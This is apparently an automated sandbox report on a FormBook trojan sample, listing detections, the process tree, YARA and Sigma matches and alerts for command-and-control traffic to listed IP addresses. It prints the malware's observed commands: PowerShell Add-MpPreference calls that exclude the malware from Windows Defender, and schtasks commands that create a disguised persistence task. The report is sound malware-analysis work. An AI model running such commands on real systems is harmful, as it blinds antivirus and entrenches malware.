Edit tour

Windows Analysis Report
8SxJ9aYfJ1.exe

Overview

General Information

Sample name:	8SxJ9aYfJ1.exe renamed because original name is a hash value
Original sample name:	e8b4997fd647c6236e8d6a5460724cee.exe
Analysis ID:	1483390
MD5:	e8b4997fd647c6236e8d6a5460724cee
SHA1:	bbd63e69c618074ff73b861b1cc19d349ddefa16
SHA256:	dc46b790c20e5077fc05879616e9d87acfdec0b4d2e2d9e82e5ce666487fdfaf
Tags:	32exetrojan
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

8SxJ9aYfJ1.exe (PID: 6064 cmdline: "C:\Users\user\Desktop\8SxJ9aYfJ1.exe" MD5: E8B4997FD647C6236E8D6A5460724CEE)

powershell.exe (PID: 6448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2960 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 424 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8SxJ9aYfJ1.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\8SxJ9aYfJ1.exe" MD5: E8B4997FD647C6236E8D6A5460724CEE)

8SxJ9aYfJ1.exe (PID: 4896 cmdline: "C:\Users\user\Desktop\8SxJ9aYfJ1.exe" MD5: E8B4997FD647C6236E8D6A5460724CEE)

sbJGUdSMCgtLQJ.exe (PID: 6184 cmdline: "C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

findstr.exe (PID: 5960 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

sbJGUdSMCgtLQJ.exe (PID: 2036 cmdline: "C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 7012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

TwkYThKVQVaYn.exe (PID: 3552 cmdline: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe MD5: E8B4997FD647C6236E8D6A5460724CEE)

schtasks.exe (PID: 4992 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpF632.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

TwkYThKVQVaYn.exe (PID: 6636 cmdline: "C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe" MD5: E8B4997FD647C6236E8D6A5460724CEE)

sbJGUdSMCgtLQJ.exe (PID: 6284 cmdline: "C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

findstr.exe (PID: 5536 cmdline: "C:\Windows\SysWOW64\findstr.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2392518879.00000000014F0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1449f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000015.00000002.2641212802.0000000000EB0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1449f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.4528036238.0000000003030000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1449f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2391710518.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ed03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17812:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000017.00000002.4532261432.0000000005200000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4884c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x3135b:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.4526845304.0000000000DD0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1449f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000012.00000002.4523991342.0000000000930000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x1449f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000013.00000002.4529774873.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x287bf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2706ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.2569786862.00000000014A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x287bf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x2706ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000011.00000002.4529392421.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7d63e1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7beef0:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.2393885514.0000000001950000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7d63e1:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7beef0:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: 8SxJ9aYfJ1.exe PID: 6064	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TwkYThKVQVaYn.exe PID: 3552	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.8SxJ9aYfJ1.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.8SxJ9aYfJ1.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ed03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17812:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
10.2.8SxJ9aYfJ1.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.8SxJ9aYfJ1.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2df03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16a12:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", ParentImage: C:\Users\user\Desktop\8SxJ9aYfJ1.exe, ParentProcessId: 6064, ParentProcessName: 8SxJ9aYfJ1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", ProcessId: 6448, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpF632.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpF632.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe, ParentImage: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe, ParentProcessId: 3552, ParentProcessName: TwkYThKVQVaYn.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpF632.tmp", ProcessId: 4992, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", ParentImage: C:\Users\user\Desktop\8SxJ9aYfJ1.exe, ParentProcessId: 6064, ParentProcessName: 8SxJ9aYfJ1.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp", ProcessId: 424, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", ParentImage: C:\Users\user\Desktop\8SxJ9aYfJ1.exe, ParentProcessId: 6064, ParentProcessName: 8SxJ9aYfJ1.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", ProcessId: 6448, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\8SxJ9aYfJ1.exe", ParentImage: C:\Users\user\Desktop\8SxJ9aYfJ1.exe, ParentProcessId: 6064, ParentProcessName: 8SxJ9aYfJ1.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TwkYThKVQVaYn" /XML "C:\Users\user\AppData\Local\Temp\tmpE0B6.tmp", ProcessId: 424, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 157.7.107.37

Timestamp:	2024-07-27T08:06:28.803781+0200
SID:	2855465
Source Port:	62392
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:07:20.520528+0200
SID:	2855464
Source Port:	62407
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:08:28.863600+0200
SID:	2855464
Source Port:	62427
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 188.95.113.62

Timestamp:	2024-07-27T08:07:42.405050+0200
SID:	2855464
Source Port:	62413
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 84.32.84.178

Timestamp:	2024-07-27T08:08:15.578235+0200
SID:	2855464
Source Port:	62423
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 203.161.50.128

Timestamp:	2024-07-27T08:06:35.062277+0200
SID:	2855464
Source Port:	62393
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 202.52.146.180

Timestamp:	2024-07-27T08:07:56.731704+0200
SID:	2855464
Source Port:	62417
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:06:09.129176+0200
SID:	2855464
Source Port:	62386
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:08:23.690331+0200
SID:	2855464
Source Port:	62425
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 51.89.93.192

Timestamp:	2024-07-27T08:06:48.990421+0200
SID:	2855464
Source Port:	62397
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 35.241.41.54

Timestamp:	2024-07-27T08:07:31.648284+0200
SID:	2855464
Source Port:	62410
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 188.95.113.62

Timestamp:	2024-07-27T08:07:44.701292+0200
SID:	2855464
Source Port:	62414
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 203.161.50.128

Timestamp:	2024-07-27T08:06:37.637614+0200
SID:	2855464
Source Port:	62394
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:07:04.642474+0200
SID:	2855464
Source Port:	62402
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:07:02.066672+0200
SID:	2855464
Source Port:	62401
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:06:06.559034+0200
SID:	2855464
Source Port:	62385
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 157.7.107.37

Timestamp:	2024-07-27T08:06:23.619790+0200
SID:	2855464
Source Port:	62390
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 51.89.93.192

Timestamp:	2024-07-27T08:06:51.342530+0200
SID:	2855464
Source Port:	62398
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:04:49.396756+0200
SID:	2855465
Source Port:	62428
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 162.241.216.26

Timestamp:	2024-07-27T08:08:50.381657+0200
SID:	2855464
Source Port:	62433
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 172.191.244.62

Timestamp:	2024-07-27T08:08:37.190433+0200
SID:	2855464
Source Port:	62429
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 203.161.50.128

Timestamp:	2024-07-27T08:06:40.286504+0200
SID:	2855464
Source Port:	62395
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:08:26.323993+0200
SID:	2855464
Source Port:	62426
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 203.161.50.128

Timestamp:	2024-07-27T08:06:42.961641+0200
SID:	2855465
Source Port:	62396
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 51.89.93.192

Timestamp:	2024-07-27T08:06:53.908398+0200
SID:	2855464
Source Port:	62399
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 84.32.84.178

Timestamp:	2024-07-27T08:08:18.124683+0200
SID:	2855465
Source Port:	62424
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 35.241.41.54

Timestamp:	2024-07-27T08:07:36.207112+0200
SID:	2855465
Source Port:	62412
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 188.95.113.62

Timestamp:	2024-07-27T08:07:50.079011+0200
SID:	2855465
Source Port:	62416
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-07-27T08:07:09.792982+0200
SID:	2855465
Source Port:	62404
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 52.165.165.26 - Destination IP: 192.168.2.6

Timestamp:	2024-07-27T08:05:32.670368+0200
SID:	2022930
Source Port:	443
Destination Port:	62382
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 84.32.84.178

Timestamp:	2024-07-27T08:08:13.006229+0200
SID:	2855464
Source Port:	62422
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 202.52.146.180

Timestamp:	2024-07-27T08:08:04.678044+0200
SID:	2855465
Source Port:	62420
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 162.241.216.26

Timestamp:	2024-07-27T08:08:52.946588+0200
SID:	2855464
Source Port:	62434
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.6 - Destination IP: 188.114.97.3

Timestamp:	2024-07-27T08:06:14.361932+0200
SID:	2855465
Source Port:	62388
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 35.241.41.54

Timestamp:	2024-07-27T08:07:28.510447+0200
SID:	2855464
Source Port:	62409
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

